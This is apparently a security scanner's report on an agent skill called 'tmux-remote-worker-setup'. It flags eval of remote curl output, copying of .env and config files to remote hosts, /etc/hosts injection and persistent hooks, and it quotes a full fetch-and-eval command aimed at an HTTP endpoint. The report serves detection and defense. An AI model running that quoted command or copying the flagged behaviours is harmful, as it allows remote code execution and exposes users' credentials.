tmux-remote-worker-setup

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). This is high risk: it's an unencrypted HTTP endpoint on an unfamiliar/likely internal domain that the skill explicitly evals (eval $(curl ...)), so it can deliver arbitrary shell instructions or proxy settings and therefore could be used to distribute malware or capture credentials.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 0.90). The skill contains high-risk patterns: it evals remote-fetched shell output (eval $(curl ...)), automatically copies local config/.env files (potentially leaking credentials) to remote machines, injects /etc/hosts entries and persistent notify hooks, and uses proxy bootstraping that can route commands through an external host — together these behaviors enable remote code execution, credential exposure, traffic redirection, and potential covert exfiltration/persistence despite there being no obfuscated payloads.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill executes remote content at runtime via eval $(curl -s http://deploy.i.shaipower.com/httpproxy) (in scripts/setup_remote_worker_from_tmux.sh -> PROXY_BOOTSTRAP), which fetches and evals code from http://deploy.i.shaipower.com/httpproxy and therefore executes remote code that controls the runtime environment.